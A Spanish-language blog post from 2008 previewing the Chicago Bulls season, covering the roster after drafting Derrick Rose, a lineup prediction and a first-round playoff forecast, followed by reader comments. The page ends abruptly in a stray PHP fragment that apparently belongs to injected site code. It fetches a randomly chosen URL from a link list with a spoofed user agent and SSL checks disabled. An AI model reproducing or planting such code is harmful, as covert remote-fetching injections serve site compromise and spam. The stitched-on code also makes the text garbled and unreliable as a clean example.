Chicago Bulls: Incógnitas tras una temporada frustrante

13 de October de 2008 por telekoman

Derrick Rose y Ben GordonComo decía la famosa canción: “No culpes al anochecer, no culpes a la luz de la luna, no culpes al buen tiempo… Culpa al Boogie”. Mucho habría que analizar para encontrar al verdadero o verdaderos culpables de la horrenda temporada que disfrutaron en Chicago el año pasado. Y fue peor todavía si tenemos en cuenta que las expectativas que se tenían de este equipo eran elevadas. Los Hinrich, Gordon, Nocioni, Deng y Wallace parecían un núcleo suficientemente duro y de calidad como para enfrentarse a la mayoría de los equipos del Este, salvando contadas excepciones como Boston o Detroit. Junto a ellos, un grupo de jóvenes prometedores como Tyrus Thomas, Noah, Sefolosha o Gray.

El resultado final lo dice todo: Fuera de playoffs con tan sólo 33 victorias. Los movimientos durante la temporada tampoco funcionaron y las aportaciones de Gooden y Hughes no fueron suficientes. Los continuos rumores de nuevos movimientos tampoco mejoraron el ambiente de una plantilla que veía como no conseguía enderezar el rumbo.

Tras el final de la temporada llegó la única buena noticia de todo el año. Chicago se llevaba la primera posición en la Lotería del Draft. Sin embargo esta primera plaza llevaba un regalo envenenado: La necesidad de elegir entre Derrick Rose, explosivo base que había llevado a los Tigers de Memphis a la Final de la NCAA, y Michael Beasley, un 4 con unos registros anotadores y reboteadores impresionantes pero que no consiguió gran cosa en el único año que estuvo con Kansas State. Estas dos posiciones estaban relativamente bien cubiertas por Hinrich y Deng, así que la elección era bastante complicada. La presencia de Rose situaría a Hinrich y Gordon en una posición un tanto inestable, mientras que elegir a Beasley truncaría la progresión de Deng.

Los Bulls se decantaron por Rose, con lo que parecía bastante claro que o Hinrich o Gordon, y con más probabilidad el primero, se verían involucrados en algún trade que reforzaría el juego interior. Pero nada más lejos de la realidad. Gordon aceptó la qualifyng offer de Chicago asegurando un año más su presencia en el equipo, mientras que Hinrich no aparece en ninguno de los rumores. De esta forma, entre los 3 se disputarán las posiciones de 1 y 2, dejando a Sefolosha, Larry Hughes y Darius Washington los pocos minutos restantes. No será raro durante la temporada que los tres estén en pista simultáneamente y Gordon pase a la posición de 3.Luol Deng

Si el entrenador, Vinny del Negro, no se deja tentar por esta posibilidad, la posición de 3 parece asignada para Andrés Nocioni, compartiendo minutos con el atlético Tyrus Thomas. Ni el argentino ni Thomas son tiradores puros, pero la presencia de Gordon y Rose ya asegura el tiro exterior.

Loul Deng será sin duda el PF titular de los bulls. El jugador africano deberá demostrar que el bache de la temporada pasada fue pasajero y recuperar parte del liderazgo que demostró la campaña anterior. Junto a él estará  un Joakin Noah que en su temporada de rookie apuntó cosas interesantes.

Y por último, la posición más débil. La falta de un center puro de garantías hará que esa posición sea ocupada principalmente por Drew Gooden. Tras su paso por Cleveland, el ex-compañero de Gasol deberá incrementar los 9 rebotes de media conseguidos la temporada pasada e intentar mantener los 14 puntos. Aaron Gray y el rookie Elton Brown no parecen recambios de garantías, pero no hay nada mejor.

Resumiendo: La falta de un juego interior más sólido, la batalla por la titularidad, junto con la mejora general de la conferencia Este, nos hace pensar que la temporada no será fácil en la Ciudad del Viento. Las miradas estarán puestas sin duda sobre Rose. No es en absoluto descartable algún movimiento durante la temporada que traiga algún refuerzo interior a cambio de Hinrich o Gordon. Si la química es buena es posible alcanzar los Playoffs, pero será difícil pasar de ahí.

Quinteto: Rose, Gordon, Nocioni, Deng y Gooden (o Hinrich, Gordon, Nocioni, Deng y Gooden, o Hinrich, Rose, Gordon, Deng y Gooden, o …)

Sexto Hombre: Hinrich (o Rose, o Nocioni)

Pronóstico: 1ª ronda de Playoffs.

Comenta

10 comentarios a esta entrada

  1. portu dice:
    #1

    Los quintetos en la NBA tienen un cierto carisma, algo que va más allá de la eficacia real de los jugadores o de su impacto verdadero en el equipo, algo que no sucede en Europa donde podemos encontrar quintetos diferentes partido tras partido… en esa línea, no veo a Deng ocupando esa posición de 4 de salida, aunque algunos minutos sí podría compartir quinteto con Nocioni y ahí ya se vería quien se ocupa del PF rival….; creo q Nocioni será un 6º hombre de los q tienen más importancia q algunos titulares y en principio, creo q el juego interior titular serán Tyrus Thomas y Gooden, con Noah como su principal recambio. En la posición de 1 no sé quien empezará de titular, quizás sea pronto para ver a Rose cargando con la responsabilidad, incluso Hinrich podría ocupar la posición de 2, pero creo q lo más probable sería Hinrich-Gordon-Deng-Tyrus-Gooden

      Citar

  2. MagicJohnson32 dice:
    #2

    Creo que el quinteto de los Bulls va a bailar mucho. Deng es indiscutible, Gooden es fijo por lo poquito que tienen dentro, y muy mal tendría que hacerlo Hinrich para irse al banco. Gordon y Nocioni lo han hecho bien cuando han actuado como 6º. A Tyrus se le ha visto poco, muy inconsistente como para ser el titular, y Noah no ha hecho muchos amigos en el vestuario.

    Vamos, que no tengo ni idea de cuál será el quinteto, y creo que ni Del Negro lo sabe.

      Citar

  3. telekoman dice:
    #3

    Es justo lo que quería dar a entender. La incógnita con Chicago es a todos los niveles. Tanto a nivel de quinteto, como a nivel de resultados, como a nivel de química interna. Yo veo a Gordon titular por encima de Hinrich y Rose, pero vaya usted a saber. O a lo mejor Del Negro decide no tener un quinteto titular al uso y dar un giro a lo europeo como dice Portu. El caso es que para los fans de Chicago esta temporada puede ser de frenopático.

      Citar

  4. Noelinho dice:
    #4

    a mi me da que la pareja de guards serán Rose y Hinrich, básicamente por las declaraciones del propio Hinrich el otro dia y de Del Negro, donde venía a decir que con ellos dos en pista se verá unos bulls más dinámicos…bla bla bla.
    Yo apuesto por un Rose – Hinrich – Deng – Noah – Gooden… o algo así :p

      Citar

  5. TheDeerHunter dice:
    #5

    Tal y como están las cosas en el este, yo también les doy como 1a ronda.
    Sobre el quinteto, tampoco veo a Deng jugando de 4 de inicio. También habrá que ver hasta que punto se puede contar con Gordon en un proyecto donde todo indica que continuará.
    En cualquier caso, corregidme si me equivoco, pero a priori el perímetro de Chicago es el más profundo y versátil de todos los de la NBA… luego está por ver cómo van a rendir sus diferentes elementos o si todos terminarán el año allí (que no tiene pinta)

    PD: Apuesto por Rose-Gordon-Deng-Gooden-Noah titulares.

      Citar

  6. Viva_Dirk dice:
    #6

    Yo apuesto por el quinteto que dice Deer, para que se vea que no le llevo la contraria por sistema, jeje. Y también coincido en que tienen un juego exterior con 5 tios que podrian ser titulares en cualquier franquicia.

    Espero un temporadón de Gordon, que al fin y al cabo el año que viene sale al mercado y motivado puede marcar diferencias por detrás de un lider. Rose-Gordon es una gran pareja, Rose es explosivo, penetrador, muy fuerte físicamente, que aprovecha muy bien ese físico y con todo esto es un base puro de los que mira primero al compañero. Gordon es capacidad anotadora sea como sea y no desentona en defensa.

    Por dentro van jodidos, Gooden-Noah puede resultar mas o menos para ganar partidos y entrar en play-offs, pero salvo explosión de Tyrus, no tienen nada que hacer ante los Garnett, Ilgauskas, Brand&Dalembert, Bosh&O’Neal o Howard.

    Salvo un traspaso que refuerce el juego interior, los veo como mucho en la 8ª plaza, pero no apostaría por ello.

      Citar

  7. Jabho dice:
    #7

    A priori apuesto por el quinteto de Noe pero como Viva preveo algún movimiento que les refuerce por dentro.

    Ala, es un equipo para Don Nelson o para D´Antoni… si no tienes interiores pues al small ball y a correr.

    Me parece un equipo muy peligroso. Espero que no se cruce en el camino de los C´s en PO

      Citar

  8. Viva_Dirk dice:
    #8

    Lo que me extraña es que D’Antoni no halla intentado cambiar a Zach por Hinrich, aunque igual lo ha intentado y no ha fructificado, jeje.

      Citar

  9. ki dice:
    #9

    hola

      Citar

  10. aro_pasado_no_newtoniano dice:
    #10

    bienvenido KI.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>